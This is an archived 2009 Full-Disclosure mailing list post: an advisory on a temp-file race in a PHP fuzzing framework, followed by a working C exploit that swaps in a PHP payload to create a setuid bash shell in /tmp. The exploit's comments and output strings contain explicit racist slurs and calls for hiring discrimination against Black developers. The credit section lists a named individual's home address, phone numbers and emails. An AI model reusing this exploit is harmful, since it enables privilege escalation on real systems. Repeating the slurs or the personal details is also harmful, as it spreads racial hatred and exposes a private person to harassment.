[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability
- From: elliot_mb@xxxxxxxxxxxx
- Date: Mon, 03 Aug 2009 14:48:29 -0400
PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability
I. BACKGROUND
PFF is a popular fuzzing suite developed by a team of highly
skilled developers
at a classified government funded information security research
center.
http://www.setec.org/~calcite/code/pff/
II. DESCRIPTION
Local exploitation of an insecure file creation method allows an
attacker to
execute arbritrary code with the privileges of the user running the
affected
application.
III. ANALYSIS
PFF uses a default location for output files before execution by
the php intepreter.
This location can be owned by another user. An attacker can then
use the time between
creation of the output file and execution of the file by the php
binary to replace
the file with a one containing the attacker's payload.
IV. DETECTION
All versions are affected.
V. WORKAROUND
Use a location not writable by another user for storage of PFF
output files.
VI. VENDOR RESPONSE
Vendor was uninterested in fixing the issue.
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has not yet
assigned an identifier to this issue.
VIII. DISCLOSURE TIMELINE
07/30/2009 10:01PM EST - Initial Contact
07/30/2009 10:05PM EST - Initial Vendor Reply
07/30/2009 10:06PM EST - Vendor expressed lack of interest in
fixing the issue.
IX. CREDIT
This vulnerability was discovered by abad1dea,
Melissa Elliott
Email:
Elliott_mb@xxxxxxxxxxxxxxxxxxxxxx
melissa@xxxxxxxxxx
Address:
408 Homestead Drive
Forest, VA 24551
Box 2073
Lynchburg Edu
Phone:
(434) 610-3058
544-8967
Web:
http://www.0xabad1dea.net
IRC:
irc.smashthestack.org/#social/esper
---
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
/*
* cheddabay.c - Insecure File creation method in pff. Yields shell
* with priveleges of user executing pff.
*
* Important note before reading on: the primary developer of this utility
* is a darkie. It is time we make a decision on whether or not to allow
* niggers to fuck up the last white industry left in the world.
* DONT HIRE NIGGERS, THEY BRING ONLY FAILURE.
*
* Shouts to irc.smashthestack.org/#social.
*
*
* Last note:
* Special thanks to Ilja Van Sprundel from SureSEC... LOVE U BABE!
* Hope we can install linux again soon!
* <3 <3 <3 <3 <3
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/inotify.h>
#define FILEA "/tmp/PFF/fuzz0.php"
#define FILEB "/tmp/fuzzlol.php"
#define MODEZ (S_IRWXU | S_IRWXG | S_IRWXO)
/*
* STOP HIRING BLACK DEVELOPERS!
* THE SOUTH WILL RISE AGAIN.
*/
int main(int argc, char *argv[])
{
int f,n,w;
char *s = "<? system(\"cp /bin/bash /tmp/sh; chmod 4777 /tmp/sh\"); ?>";
struct inotify_event e;
n = inotify_init();
printf("-= nigger chaser initialized =-\n");
if ((f = open(FILEB, O_CREAT | O_RDWR| O_EXCL, MODEZ)) > 0){
write(f, s, strlen(s));
close(f);
}
printf("[+] created abritrary code: %s\n", FILEB);
w = inotify_add_watch(n, "/tmp/PFF", IN_CREATE);
read(n, &e, sizeof(e));
rename(FILEB, FILEA);
printf("[+] %s => %s\n", FILEB, FILEA);
printf("[+] executing arbitrary code\n");
sleep(2);
printf("[+] racism complete \n");
execl("/tmp/sh", "/tmp/sh", 0);
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/